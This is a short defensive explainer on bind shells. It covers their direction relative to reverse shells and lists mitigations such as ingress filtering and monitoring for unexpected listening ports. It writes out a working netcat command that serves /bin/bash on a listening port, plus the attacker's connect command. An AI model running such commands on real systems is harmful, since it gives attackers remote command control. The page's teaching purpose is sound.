A bind shell is a shell session where the compromised machine opens a listening port and waits for the attacker to connect in, receiving command-line control. It is the opposite direction of a reverse shell. Bind shells are simpler but require the attacker to reach an inbound port on the target, which firewalls and NAT usually block, so they are less common than reverse shells in real engagements except on directly reachable hosts.
What a bind shell is
A bind shell binds a shell to a listening port on the target. The attacker then connects to that port and gets an interactive shell.
The key difference from a reverse shell is direction: the target is the server (it listens), and the attacker is the client (it connects in). That only works if the attacker can actually reach the listening port, which means no firewall or NAT in the way.
How it works and payload
The target opens a listener bound to a shell; the attacker connects:
- Target (listen and serve a shell):
nc -lvnp 4444 -e /bin/bash(or amkfifovariant where-eis unavailable) - Attacker (connect in):
nc TARGET-IP 4444 - Windows target: a PowerShell TCP listener that pipes input to
cmd.
The attacker now has a shell, but only because they could reach port 4444 on the target. Documented techniques shown for defenders.
How to defend
- Filter inbound (ingress) traffic so unexpected listening ports are unreachable.
- Use host firewalls to block unsolicited inbound connections to workstations and servers.
- Monitor for processes opening unexpected listening ports, especially shells.
- Use application allow-listing to stop unauthorised tools from running.
- Segment so even a reachable bind shell cannot pivot widely.
References
- [1]MITRE ATT&CK: Lateral Movement (TA0008)(MITRE)
- [2]NIST SP 800-115 Technical Guide to Security Testing(NIST)
- [3]Linux man-pages: ssh(1)(man7.org)